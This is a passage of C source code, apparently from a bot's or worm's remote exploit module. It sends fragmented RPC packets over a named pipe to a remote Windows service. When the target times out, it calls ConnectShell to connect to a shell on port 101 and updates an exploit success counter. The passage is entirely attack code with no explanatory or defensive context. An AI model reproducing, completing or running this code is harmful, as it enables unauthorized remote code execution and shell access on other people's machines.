ReqNormalHeader.prescontext = 0;
ReqNormalHeader.opnum = 0x1f;
memset( &ov, 0, sizeof( ov ) );
ov.hEvent = CreateEvent( NULL, TRUE, FALSE, NULL );
bExit = false;
nCount = 0;
while( !bExit && nCount < MAX_TRIES )
{
nCount++;
if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nBufferPos, MAX_FRAG_SIZE, true ) )
break;
if( ov.hEvent )
{
if( !ReadFile( hPipe, RecvBuff, sizeof( RecvBuff ), &nBytesRead, &ov ) && GetLastError() != ERROR_IO_PENDING )
return false;
else
{
if( WaitForSingleObject( ov.hEvent, TRY_TIMEOUT ) == WAIT_TIMEOUT )
{
bExit = true;
ConnectShell (exinfo, 101);
exploit[exinfo.exploit].stats++;
}
}
}
}
CloseHandle( hPipe );
free( pPacket );
if( ov.hEvent )
CloseHandle( ov.hEvent );
if (bExit)
return true;
return false;
}
